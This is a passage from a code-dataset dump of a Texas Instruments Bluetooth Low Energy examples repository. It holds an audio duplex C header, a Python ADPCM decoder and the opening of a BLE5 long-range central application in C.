AUDIO_DUPLEX_MSBC_ENCODED_SIZE 57\n\n#define AUDIO_DUPLEX_SAMPLE_RATE 16000\n#define AUDIO_DUPLEX_NUM_CHAN 2\n\n/*********************************************************************\n * TYPEDEFS\n */\ntypedef enum\n{\n AudioDuplex_stream_idle,\n AudioDuplex_send_start_cmd,\n AudioDuplex_start_I2S,\n AudioDuplex_stream_active,\n AudioDuplex_send_stop_cmd,\n AudioDuplex_stop_I2S,\n}AudioDuplex_streamState;\n\n/**\n * This enum is used to identify the data passed on from _processGATTMsg\n */\ntypedef enum\n{\n AudioDuplex_start_stop,\n AudioDuplex_data\n} AudioDuplex_dataType;\n\n/**\n * General data struct.\n */\ntypedef struct\n{\n uint16 len; //!< Length of data\n uint8 *pValue; //!< Data\n} AudioDuplex_audioData;\n\ntypedef struct\n{\n AudioDuplex_streamState streamState;\n AudioDuplex_streamState requestedStreamState;\n uint8_t streamType;\n uint8_t requestedStreamType;\n uint8_t samplesPerFrame;\n uint8_t notificationsPerFrame;\n uint8_t numOfFramesToBuffer;\n uint8_t rfFrameSize;\n int8_t si; //Step Index\n int16_t pv; //Predict Value\n int8_t si_rx;\n int16_t pv_rx;\n int8_t maxVolume;\n} AudioDuplex_streamVars;\n\n/**\n * @brief Audio Duplex Callback Function\n *\n * This callback notifies the application of an event that occurred in a\n * lower layer audio callback such as the I2S module\n *\n * @param events Bitmask of events posted by audio duplex module\n */\ntypedef void (*pfnAudioDuplexCB_t)(uint8_t events);\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn AudioDuplex_open\n *\n * @brief Called during initialization, opens codec and I2S driver\n * Initializes hardware and adds Audio Profile\n *\n * @param None.\n *\n * @return None.\n */\nextern int8_t AudioDuplex_open(Display_Handle displayHandle,\n PIN_Handle pinHandle,\n pfnAudioDuplexCB_t inputCB);\n\n/*********************************************************************\n * @fn AudioDuplex_close\n *\n * @brief Closes hardware, stops streaming\n *\n * @param None.\n *\n * @return None.\n */\nextern void AudioDuplex_close(void);\n\n/*********************************************************************\n * @fn AudioDuplex_setConnectionHandle\n *\n * @brief Set the connection handle of audio streaming\n *\n * @param cxnHdl - Connection handle.\n *\n * @return None\n */\nextern void AudioDuplex_setConnectionHandle(uint16_t connectionHandle);\n\n/*********************************************************************\n * @fn AudioDuplex_getConnectionHandle\n *\n * @brief Get the connection handle of audio streaming\n *\n * @return connectionHandle- the handle used to stream\n */\nextern uint16_t AudioDuplex_getConnectionHandle(void);\n\n/*********************************************************************\n * @fn AudioDuplex_eventHandler\n *\n * @brief Processes Events called from I2S or BLE-Stack callbacks\n *\n * @param events - Events to process.\n *\n * @return None\n */\nextern void AudioDuplex_eventHandler(uint8_t events);\n\n/*********************************************************************\n * @fn AudioDuplex_processData\n *\n * @brief Process incoming audio data\n *\n * @return None\n */\nextern void AudioDuplex_processData(AudioDuplex_dataType data_type,\n AudioDuplex_audioData *pMsg);\n\n/*********************************************************************\n * @fn AudioDuplex_startStreaming\n *\n * @brief Starts streaming audio to connected device\n *\n * @param requestedStreamType 
- The type of stream to start:\n * - AUDIO_DUPLEX_STREAM_TYPE_ADPCM\n * - AUDIO_DUPLEX_STREAM_TYPE_MSBC\n *\n * @return None.\n */\nextern void AudioDuplex_startStreaming(uint8_t requestedStreamType);\n\n/*********************************************************************\n * @fn AudioDuplex_stopStreaming\n *\n * @brief Close and cleanup audio stream\n *\n * @param None.\n *\n * @return None.\n */\nextern void AudioDuplex_stopStreaming(void);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* AUDIO_DUPLEX_H */\n"
},
{
"alpha_fraction": 0.5140917301177979,
"alphanum_fraction": 0.5862991213798523,
"avg_line_length": 32.75694274902344,
"blob_id": "ecfdd638c4e58485ffeccc46fedf39cc5175562e",
"content_id": "e62d4b845fc6990407a8157098086a9a290bb0db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4861,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 144,
"path": "/tools/scripts/voice/codec/adpcm.py",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*\n * Filename: codecs.py\n *\n * Description: Various codes used by the audio script\n *\n * Copyright (C) 2017 Texas Instruments Incorporated - http://www.ti.com/\n *\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the\n * distribution.\n *\n * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n * \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n */\n\"\"\"\n\nfrom .codec import CodecBase\nimport logging\nfrom struct import unpack, pack\n\n\nclass ADPCM(CodecBase):\n \"\"\"\n Implementation of a Codec class for TI's PDM driver\n \"\"\"\n\n __STEPSIZE_LUT = [\n 7, 8, 9, 10, 11, 12, 13, 14, 16, 17, 19, 21, 23, 25, 28, 31,\n 34, 37, 41, 45, 50, 55, 60, 66, 73, 80, 88, 97, 107, 118, 130, 143,\n 157, 173, 190, 209, 230, 253, 279, 307, 337, 371, 408, 449, 494, 544, 598, 658,\n 724, 796, 876, 963, 1060, 1166, 1282, 1411, 1552, 1707, 1878, 2066, 2272, 2499, 2749, 3024,\n 3327, 3660, 4026, 4428, 4871, 5358, 5894, 6484, 7132, 7845, 8630, 9493, 10442, 11487, 12635, 13899,\n 15289, 16818, 18500, 20350, 22385, 24623, 27086, 29794, 32767\n ]\n\n __INDEXLUT = [\n -1, -1, -1, -1, 2, 4, 6, 8,\n -1, -1, -1, -1, 2, 4, 6, 8\n ]\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.logger = logging.getLogger(self.__class__.__name__)\n self.logger.info(\"Init\")\n\n self.__SI_Dec = 0\n self.__PV_Dec = 0\n\n def decode(self, buffer):\n \"\"\"\n Function to decode the buffer\n\n :param buffer: coded buffer\n :return: The decoded data\n \"\"\"\n decoded = bytearray()\n\n for b in buffer:\n b, = unpack('B', b)\n self.logger.debug(\"decode: 0x%02X\", b)\n sample1 = self.__tic1_DecodeSingle(b & 0x0F)\n sample2 = self.__tic1_DecodeSingle((b >> 4) & 0xF)\n decoded += pack('@hh', sample1, sample2)\n\n return decoded\n\n def __tic1_DecodeSingle(self, nibble):\n\n self.logger.debug(\"__tic1_DecodeSingle: 0x%X\", nibble)\n\n step = ADPCM.__STEPSIZE_LUT[self.__SI_Dec]\n cum_diff = step >> 3\n\n self.__SI_Dec += ADPCM.__INDEXLUT[nibble]\n\n if self.__SI_Dec < 0:\n self.__SI_Dec = 0\n if self.__SI_Dec > 88:\n self.__SI_Dec = 88\n\n if nibble & 4:\n cum_diff += step\n if nibble & 2:\n cum_diff += step >> 1\n if nibble & 1:\n cum_diff += step >> 2\n\n if nibble & 
\n def __tic1_DecodeSingle(self, nibble):\n\n self.logger.debug(\"__tic1_DecodeSingle: 0x%X\", nibble)\n\n step = ADPCM.__STEPSIZE_LUT[self.__SI_Dec]\n cum_diff = step >> 3\n\n self.__SI_Dec += ADPCM.__INDEXLUT[nibble]\n\n if self.__SI_Dec < 0:\n self.__SI_Dec = 0\n if self.__SI_Dec > 88:\n self.__SI_Dec = 88\n\n if nibble & 4:\n cum_diff += step\n if nibble & 2:\n cum_diff += step >> 1\n if nibble & 1:\n cum_diff += step >> 2\n\n if nibble & 8:\n if self.__PV_Dec < (-32767+cum_diff):\n self.__PV_Dec = -32767\n else:\n self.__PV_Dec -= cum_diff\n else:\n if self.__PV_Dec > (0x7fff-cum_diff):\n self.__PV_Dec = 0x7fff\n else:\n self.__PV_Dec += cum_diff\n\n return self.__PV_Dec\n\n\nif __name__ == '__main__':\n logger = logging.getLogger(\"ADPCM\")\n logger.setLevel(logging.CRITICAL)\n logger.setLevel(logging.ERROR)\n logger.setLevel(logging.WARNING)\n logger.setLevel(logging.INFO)\n logger.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch = logging.StreamHandler()\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n print ('Subclass:', issubclass(ADPCM, CodecBase))\n print ('Instance:', isinstance(ADPCM(), CodecBase))\n\n test = ADPCM()\n"
},
{
"alpha_fraction": 0.5837576985359192,
"alphanum_fraction": 0.5926284193992615,
"avg_line_length": 29.43836212158203,
"blob_id": "ee35927058372c7931dcd84ef1c176dd3e775b65",
"content_id": "0160e63f93a6cdb844b55959bdebc87ba3926c33",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 66173,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 2174,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/longrange_central/src/app/longrange_central.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/******************************************************************************\n\n @file longrange_central.c\n\n @brief This file contains the Throughput Central sample application for use\n with the CC2650 Bluetooth Low Energy Protocol Stack.\n\n Group: CMCU, SCS\n Target Device: CC2640R2\n\n ******************************************************************************\n\n Copyright (c) 2013-2017, Texas Instruments Incorporated\n All rights reserved.\n\n Redistribution and use in source and binary forms, with or without\n modification, are permitted provided that the following conditions\n are met:\n\n * Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n * Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in the\n documentation and/or other materials provided with the distribution.\n\n * Neither the name of Texas Instruments Incorporated nor the names of\n its contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\n THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n ******************************************************************************\n Release Name: simplelink_cc2640r2_sdk_1_35_00_07_eng\n Release Date: 2017-03-23 10:36:21\n *****************************************************************************/\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include <ti/sysbios/knl/Task.h>\n#include <ti/sysbios/knl/Clock.h>\n#include <ti/sysbios/knl/Event.h>\n#include <ti/sysbios/knl/Queue.h>\n#include <ti/sysbios/hal/Hwi.h>\n\n#include <ti/display/Display.h>\n\n#include \"bcomdef.h\"\n\n#include <icall.h>\n#include \"util.h\"\n/* This Header file contains all BLE API and icall structure definition */\n#include \"icall_ble_api.h\"\n\n#include \"central.h\"\n\n#include \"board_key.h\"\n#include <menu/two_btn_menu.h>\n\n#include \"longrange_central_menu.h\"\n#include \"profiles/temperature/temperature_service.h\"\n#include \"profiles/throughput/throughput_service.h\"\n\n#include \"board.h\"\n\n#include \"longrange_central.h\"\n\n#include \"ble_user_config.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n// These Constants are for Application Queue Events\n// These Events contain information on the Queue and need to be processed\n#define SBC_STATE_CHANGE_EVT 0x0001\n#define SBC_KEY_CHANGE_EVT 0x0002\n#define SBC_RSSI_READ_EVT 0x0004\n#define SBC_PDU_UPDATE_EVT 0x0008\n#define SBC_PHY_UPDATE_EVT 0x0010\n#define 
SBC_MEASURE_INST_SPEED_EVT 0x0020\n#define SBC_ENABLE_TEMPERATURE_NOTI_EVT 0x0040\n\n// Simple BLE Central Task Events - often containing no information to process\n// other than the event itself\n#define SBC_ICALL_EVT ICALL_MSG_EVENT_ID // Event_Id_31\n#define SBC_QUEUE_EVT UTIL_QUEUE_EVENT_ID // Event_Id_30\n#define SBC_START_DISCOVERY_EVT Event_Id_00\n#define SBC_PERIODIC_LED_EVT Event_Id_01\n\n#define SBC_ALL_EVENTS (SBC_ICALL_EVT | \\\n SBC_QUEUE_EVT | \\\n SBC_START_DISCOVERY_EVT | \\\n SBC_PERIODIC_LED_EVT)\n\n// Maximum number of scan responses\n#define DEFAULT_MAX_SCAN_RES 8\n\n// Scan duration in ms\n#define DEFAULT_SCAN_DURATION 4000\n\n// Discovery mode (limited, general, all)\n#define DEFAULT_DISCOVERY_MODE DEVDISC_MODE_ALL\n\n// TRUE to use active scan\n#define DEFAULT_DISCOVERY_ACTIVE_SCAN TRUE\n\n// TRUE to use white list during discovery\n#define DEFAULT_DISCOVERY_WHITE_LIST FALSE\n\n// TRUE to use high scan duty cycle when creating link\n#define DEFAULT_LINK_HIGH_DUTY_CYCLE FALSE\n\n// TRUE to use white list when creating link\n#define DEFAULT_LINK_WHITE_LIST FALSE\n\n// Default RSSI polling period in ms\n#define DEFAULT_RSSI_PERIOD 4000\n\n#define SBC_PERIODIC_LED_PERIOD 500\n\n// Whether to enable automatic parameter update request when a connection is\n// formed\n#define DEFAULT_ENABLE_UPDATE_REQUEST GAPCENTRALROLE_PARAM_UPDATE_REQ_AUTO_ACCEPT\n\n// Minimum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MIN_CONN_INTERVAL 400\n\n// Maximum connection interval (units of 1.25ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_MAX_CONN_INTERVAL 800\n\n// Slave latency to use if automatic parameter update request is enabled\n#define DEFAULT_UPDATE_SLAVE_LATENCY 0\n\n// Supervision timeout value (units of 10ms) if automatic parameter update\n// request is enabled\n#define DEFAULT_UPDATE_CONN_TIMEOUT 100\n\n// Default service discovery timer delay in ms\n#define DEFAULT_SVC_DISCOVERY_DELAY 3000\n\n#define CODED_PHY_CHANGE_DELAY 500\n\n// Type of Display to open\n#if defined(BOARD_DISPLAY_USE_LCD) && (BOARD_DISPLAY_USE_LCD!=0)\n #define SBC_DISPLAY_TYPE Display_Type_LCD\n#elif defined (BOARD_DISPLAY_USE_UART) && (BOARD_DISPLAY_USE_UART!=0)\n #define SBC_DISPLAY_TYPE Display_Type_UART\n#else // !BOARD_DISPLAY_USE_LCD && !BOARD_DISPLAY_USE_UART\n #define SBC_DISPLAY_TYPE 0 // Option not supported\n#endif // BOARD_DISPLAY_USE_LCD && BOARD_DISPLAY_USE_UART\n\n// Row numbers\n#define SBC_ROW_RESULT TBM_ROW_APP\n#define SBC_ROW_STATUS_1 (TBM_ROW_APP + 1)\n#define SBC_ROW_STATUS_2 (TBM_ROW_APP + 2)\n#define SBC_ROW_PEER_DEVICE (TBM_ROW_APP + 2)\n#define SBC_ROW_STATUS_3 (TBM_ROW_APP + 3)\n#define SBC_ROW_PHY (TBM_ROW_APP + 3)\n#define SBC_ROW_RSSI (TBM_ROW_APP + 4)\n#define SBC_ROW_TEMP (TBM_ROW_APP + 5)\n\n// Task configuration\n#define SBC_TASK_PRIORITY 1\n\n#ifndef SBC_TASK_STACK_SIZE\n#define SBC_TASK_STACK_SIZE 864\n#endif\n#define DLE_MAX_PDU_SIZE 251\n#define DLE_MAX_TX_TIME 17040\n\n#define DEFAULT_PDU_SIZE 27\n#define DEFAULT_TX_TIME 328\n\n// Application states\nenum\n{\n BLE_STATE_IDLE,\n BLE_STATE_CONNECTING,\n BLE_STATE_CONNECTED,\n BLE_STATE_DISCONNECTING\n};\n\n// Discovery states\nenum\n{\n BLE_DISC_STATE_IDLE, // Idle\n BLE_DISC_STATE_MTU, // Exchange ATT MTU size\n BLE_DISC_STATE_THROUGHPUT_SERVICE, // Throughput Service discovery\n BLE_DISC_STATE_THROUGHPUT_CHAR, // Throughput Characteristic discovery\n BLE_DISC_STATE_TEMPERATURE_SERVICE, // Temperature Service 
discovery\n BLE_DISC_STATE_TEMPERATURE_CHAR, // Temperature Characteristic discovery\n};\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n// App event passed from profiles.\ntypedef struct\n{\n appEvtHdr_t hdr; // event header\n uint8_t *pData; // event data\n} sbcEvt_t;\n\n// RSSI read data structure\ntypedef struct\n{\n uint16_t period; // how often to read RSSI\n uint16_t connHandle; // connection handle\n Clock_Struct *pClock; // pointer to clock struct\n} readRssi_t;\n\n// A struct to contain scan response data we're interested in\n// Nameless struct typedefed to scanResultDeviceRecord_t\ntypedef struct\n{\n uint8 addrType; //!< Address Type: @ref GAP_Addr_Types\n uint8 addr[B_ADDR_LEN]; //!< Device's Address\n} scanResultDeviceRecord_t;\n\ntypedef struct\n{\n uint16_t charHdl; //!< Characteristic Handle\n uint8 addr[ATT_UUID_SIZE]; //!< UUID of characteristic\n} CharProfileHdl_t;\n\n/*********************************************************************\n * GLOBAL VARIABLES\n */\n\n// Display Interface\nDisplay_Handle dispHandle = NULL;\n\n/*********************************************************************\n * EXTERNAL VARIABLES\n */\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\n// Entity ID globally used to check for source and/or destination of messages\nstatic ICall_EntityID selfEntity;\n\n// Event globally used to post local events and pend on system and\n// local events.\nstatic ICall_SyncHandle syncEvent;\n\n// Clock object used to signal timeout\nstatic Clock_Struct startDiscClock;\nstatic Clock_Struct periodicLED;\nstatic Clock_Struct startPHYClock;\n\n// Queue object used for app messages\nstatic Queue_Struct appMsg;\nstatic Queue_Handle appMsgQueue;\n\n// Task configuration\nTask_Struct sbcTask;\nChar sbcTaskStack[SBC_TASK_STACK_SIZE];\n\n// GAP GATT Attributes\nstatic const uint8_t attDeviceName[GAP_DEVICE_NAME_LEN] = \"BLE5 Central\";\n\n// Number of scan results and scan result index\nstatic uint8_t scanRes = 0;\nstatic int8_t scanIdx = -1;\n\n// Scan result list\nstatic scanResultDeviceRecord_t devList[DEFAULT_MAX_SCAN_RES];\n\n// Connection handle of current connection\nstatic uint16_t connHandle = GAP_CONNHANDLE_INIT;\n\n// Application state\nstatic uint8_t state = BLE_STATE_IDLE;\n\n// Discovery state\nstatic uint8_t discState = BLE_DISC_STATE_IDLE;\n\n// Discovered service start and end handle\nstatic uint16_t svcStartHdl = 0;\nstatic uint16_t svcEndHdl = 0;\n\n// Maximum PDU size (default = 27 octets)\nstatic uint16 maxPduSize;\n\n// Array of RSSI read structures\nstatic readRssi_t readRssi[MAX_NUM_BLE_CONNS];\n\n//// Received byte counters + circular buffer for Throughput Data\n//static volatile uint32_t bytesRecvd = 0;\n//#define CB_SIZE 10\n//static uint32_t bytesRecvd_cb[CB_SIZE];\n//static int bytesRecvd_cb_index = 0;\n//static bool cbBufferFilled = false;\n\n// Strings for PHY\nstatic uint8_t* phyName[] = {\n \"1 Mbps\", \"2 Mbps\",\n \"Coded:S2\", \"Coded:S8\",\n \"Coded\"\n};\n\n// PHY Index\nstatic uint8_t phyIndex = 0;\nstatic bool phyConfirm = true;\n\n// Pointer to requested PHY index\nstatic uint8_t* phyClock_phyIndex= 0;\n\n// PHY Options\nstatic uint16_t phyOptions = HCI_PHY_OPT_NONE;\n\nstatic CharProfileHdl_t* throughputHandles = NULL;\nstatic CharProfileHdl_t* temperatureHandles = NULL;\n\n// PIN config\n\n// Global pin resources\nPIN_State pin;\nPIN_Handle appPins;\nstatic PIN_Config pinTable[] =\n{\n Board_RLED | PIN_GPIO_OUTPUT_EN | 
PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* LED initially off */\n Board_GLED | PIN_GPIO_OUTPUT_EN | PIN_GPIO_LOW | PIN_PUSHPULL | PIN_DRVSTR_MAX, /* LED initially off */\n\n PIN_TERMINATE\n};\n\n/*********************************************************************\n * LOCAL FUNCTIONS\n */\nstatic void SimpleBLECentral_init(void);\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1);\n\nstatic void SimpleBLECentral_processGATTMsg(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_handleKeys(uint8_t shift, uint8_t keys);\nstatic void SimpleBLECentral_processStackMsg(ICall_Hdr *pMsg);\nstatic void SimpleBLECentral_processAppMsg(sbcEvt_t *pMsg);\nstatic void SimpleBLECentral_processRoleEvent(gapCentralRoleEvent_t *pEvent);\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg);\nstatic void SimpleBLECentral_startDiscovery(void);\nstatic bool SimpleBLECentral_findSvcUuid(uint16_t uuid, uint8_t *pData, uint8_t dataLen);\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data);\nstatic void SimpleBLECentral_performLEDTask(void);\nstatic void SimpleBLECentral_clockHandler(UArg arg);\n\nstatic void SimpleBLECentral_processCmdCompleteEvt(hciEvt_CmdComplete_t *pMsg);\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period);\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle);\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle);\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle);\n\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent);\n\nvoid SimpleBLECentral_speedHandler(UArg a0);\nvoid SimpleBLECentral_PHYHandler(UArg a0);\nvoid SimpleBLECentral_startDiscHandler(UArg a0);\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys);\nvoid SimpleBLECentral_readRssiHandler(UArg a0);\n\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t status,\n void *pData);\n\nstatic void SBC_ClearDeviceList();\nstatic void SBC_NextDevice();\nstatic void SBC_ConnectToDevice();\n\n/*********************************************************************\n * EXTERN FUNCTIONS\n */\nextern void AssertHandler(uint8 assertCause, uint8 assertSubcause);\n\n/*********************************************************************\n * PROFILE CALLBACKS\n */\n\n// GAP Role Callbacks\nstatic gapCentralRoleCB_t SimpleBLECentral_roleCB =\n{\n SimpleBLECentral_eventCB // Event callback\n};\n\n/*********************************************************************\n * PUBLIC FUNCTIONS\n */\n\n/*********************************************************************\n * @fn SimpleBLEPeripheral_createTask\n *\n * @brief Task creation function for the Simple BLE Peripheral.\n *\n * @param none\n *\n * @return none\n */\nvoid SimpleBLECentral_createTask(void)\n{\n Task_Params taskParams;\n\n // Configure task\n Task_Params_init(&taskParams);\n taskParams.stack = sbcTaskStack;\n taskParams.stackSize = SBC_TASK_STACK_SIZE;\n taskParams.priority = SBC_TASK_PRIORITY;\n\n Task_construct(&sbcTask, SimpleBLECentral_taskFxn, &taskParams, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_Init\n *\n * @brief Initialization function for the Simple BLE Central App Task.\n * This is called during initialization and should contain\n * any application specific initialization (ie. 
hardware\n * initialization/setup, table initialization, power up\n * notification).\n *\n * @param none\n *\n * @return none\n */\nstatic void SimpleBLECentral_init(void)\n{\n uint8_t i;\n\n // ******************************************************************\n // NO STACK API CALLS CAN OCCUR BEFORE THIS CALL TO ICall_registerApp\n // ******************************************************************\n // Register the current thread as an ICall dispatcher application\n // so that the application can send and receive messages.\n ICall_registerApp(&selfEntity, &syncEvent);\n\n appPins = PIN_open(&pin, pinTable);\n PIN_setOutputValue(appPins, Board_RLED, Board_LED_ON);\n\n // Create an RTOS queue for messages from profile to be sent to app.\n appMsgQueue = Util_constructQueue(&appMsg);\n\n // Setup discovery delay as a one-shot timer\n Util_constructClock(&startDiscClock, SimpleBLECentral_startDiscHandler,\n DEFAULT_SVC_DISCOVERY_DELAY, 0, false, NULL);\n\n // Setup the periodic LED clock\n // Create one-shot clocks for internal periodic events.\n Util_constructClock(&periodicLED, SimpleBLECentral_clockHandler,\n SBC_PERIODIC_LED_PERIOD, 0, false, SBC_PERIODIC_LED_EVT);\n\n // Set up a PHY Clock for transitions between Coded PHYs\n Util_constructClock(&startPHYClock, SimpleBLECentral_PHYHandler,\n 0, 0, false, 0);\n\n Board_initKeys(SimpleBLECentral_keyChangeHandler);\n\n // Open Display.\n dispHandle = Display_open(SBC_DISPLAY_TYPE, NULL);\n\n // Initialize internal data\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n readRssi[i].connHandle = GAP_CONNHANDLE_ALL;\n readRssi[i].pClock = NULL;\n }\n\n // Setup Central Profile\n {\n uint8_t scanRes = DEFAULT_MAX_SCAN_RES;\n\n GAPCentralRole_SetParameter(GAPCENTRALROLE_MAX_SCAN_RES, sizeof(uint8_t),\n &scanRes);\n }\n\n // Setup GAP\n GAP_SetParamValue(TGAP_GEN_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GAP_SetParamValue(TGAP_LIM_DISC_SCAN, DEFAULT_SCAN_DURATION);\n GGS_SetParameter(GGS_DEVICE_NAME_ATT, GAP_DEVICE_NAME_LEN,\n (void *)attDeviceName);\n\n // Initialize GATT Client\n VOID GATT_InitClient();\n\n // Register to receive incoming ATT Indications/Notifications\n GATT_RegisterForInd(selfEntity);\n\n // Initialize GATT attributes\n GGS_AddService(GATT_ALL_SERVICES); // GAP\n GATTServApp_AddService(GATT_ALL_SERVICES); // GATT attributes\n\n // Start the Device\n VOID GAPCentralRole_StartDevice(&SimpleBLECentral_roleCB);\n\n // Register with GAP for HCI/Host messages (for RSSI)\n GAP_RegisterForMsgs(selfEntity);\n\n // Register for GATT local events and ATT Responses pending for transmission\n GATT_RegisterForMsgs(selfEntity);\n\n /*\n * TBM stuff\n */\n\n // Set the title of the main menu\n TBM_SET_TITLE(&sbcMenuMain, \"Texas Instruments Bluetooth 5 Long Range Demo\");\n\n // Initialize Two-Button Menu module\n tbm_setItemStatus(&sbcMenuMain, TBM_ITEM_0, TBM_ITEM_1 | TBM_ITEM_2 );\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_ALL, TBM_ITEM_0 | TBM_ITEM_1);\n\n tbm_initTwoBtnMenu(dispHandle, &sbcMenuMain, 2, NULL);\n\n // Get Current Data Length\n HCI_LE_ReadMaxDataLenCmd();\n\n // By Default Allow Central to support any and all PHYs\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_ANY_PHY,\n LL_PHY_1_MBPS | LL_PHY_2_MBPS | HCI_PHY_CODED,\n LL_PHY_1_MBPS | LL_PHY_2_MBPS | HCI_PHY_CODED);\n\n // Boost TX power and RX gain for maximum range\n HCI_EXT_SetTxPowerCmd(HCI_EXT_TX_POWER_5_DBM);\n HCI_EXT_SetRxGainCmd(HCI_EXT_RX_GAIN_HIGH);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_taskFxn\n *\n * @brief Application task entry point for 
the Simple BLE Central.\n *\n * @param none\n *\n * @return events not processed\n */\nstatic void SimpleBLECentral_taskFxn(UArg a0, UArg a1)\n{\n // Initialize application\n SimpleBLECentral_init();\n\n // Application main loop\n for (;;)\n {\n uint32_t events;\n\n events = Event_pend(syncEvent, Event_Id_NONE, SBC_ALL_EVENTS,\n ICALL_TIMEOUT_FOREVER);\n\n if (events)\n {\n ICall_EntityID dest;\n ICall_ServiceEnum src;\n ICall_HciExtEvt *pMsg = NULL;\n\n if (ICall_fetchServiceMsg(&src, &dest,\n (void **)&pMsg) == ICALL_ERRNO_SUCCESS)\n {\n if ((src == ICALL_SERVICE_CLASS_BLE) && (dest == selfEntity))\n {\n // Process inter-task message\n SimpleBLECentral_processStackMsg((ICall_Hdr *)pMsg);\n }\n\n if (pMsg)\n {\n ICall_freeMsg(pMsg);\n }\n }\n\n // If RTOS queue is not empty, process app message\n if (events & SBC_QUEUE_EVT)\n {\n while (!Queue_empty(appMsgQueue))\n {\n sbcEvt_t *pMsg = (sbcEvt_t *)Util_dequeueMsg(appMsgQueue);\n if (pMsg)\n {\n // Process message\n SimpleBLECentral_processAppMsg(pMsg);\n\n // Free the space from the message\n ICall_free(pMsg);\n }\n }\n }\n\n // Start Discovery Event\n if (events & SBC_START_DISCOVERY_EVT)\n {\n 